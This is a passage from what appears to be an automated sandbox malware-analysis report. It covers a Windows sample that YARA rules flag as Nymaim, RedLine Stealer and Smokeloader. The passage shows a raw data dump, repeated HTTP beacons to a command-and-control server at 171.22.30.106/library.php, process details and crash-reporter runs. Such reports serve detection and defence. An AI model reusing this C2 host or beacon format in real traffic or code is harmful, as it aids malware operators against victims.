                                                      Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00
                                                      Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq|2iR2WFC=MUH6A@OcMx8L- b|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i*)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(*PJ#:ISD}vjK9LQF


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.749705171.22.30.10680C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:20:41.596618891 CEST4539OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:42.126015902 CEST4540INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:41 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:44.182995081 CEST4541OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:44.705418110 CEST4541INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:44 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:46.778824091 CEST4542OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:47.310522079 CEST4543INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:46 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=98
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:49.372236013 CEST4543OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:49.987782001 CEST4543INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:49 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=97
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:52.073888063 CEST4544OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:52.596786976 CEST4544INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:52 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=96
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:55.852951050 CEST4545OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:56.371438980 CEST4545INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:55 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=95
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:20:58.434901953 CEST4546OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:58.968936920 CEST4546INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:58 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=94
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:21:01.113761902 CEST4546OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:21:01.628479004 CEST4547INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:21:01 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=93
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:21:03.731251001 CEST4547OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:21:04.283998013 CEST4547INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:21:03 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=92
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:21:06.413492918 CEST4548OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:21:06.929377079 CEST4549INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:21:06 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=91
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.749711171.22.30.10680C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:21:10.627796888 CEST4550OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:21:11.140237093 CEST4550INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:21:10 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:17:19:36
                                                      Start date:03/10/2022
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                      Imagebase:0x400000
                                                      File size:238080 bytes
                                                      MD5 hash:A3B774ED5023F56970EEA0668AE65703
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.423202429.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.436811597.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.404054334.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.398224905.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.429736065.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.442523411.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.404703322.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.397772585.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.398439269.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.429893490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.403746103.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.449787339.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.435884900.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.444030795.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.387732465.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.398529182.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.436582562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.389024466.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.429105410.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.397514414.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.389435332.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.429950060.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.404645507.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.429384361.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.422448274.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.442925431.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.443712721.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.397232349.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.404463873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.449688611.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.384726127.00000000008A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.423616490.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.449473682.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.403954435.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.422077182.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.436080852.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.450901670.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.429267314.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.388203778.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.436745774.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.442728263.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.450741403.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.388613281.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.450525334.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.423688674.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.436219416.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.421209172.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.387383438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.444122834.00000000008F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low

                                                      General

                                                      Target ID:3
                                                      Start time:17:19:42
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 528
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:5
                                                      Start time:17:19:46
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 708
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:7
                                                      Start time:17:19:49
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 716
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:11
                                                      Start time:17:19:58
                                                      Start date:03/10/2022
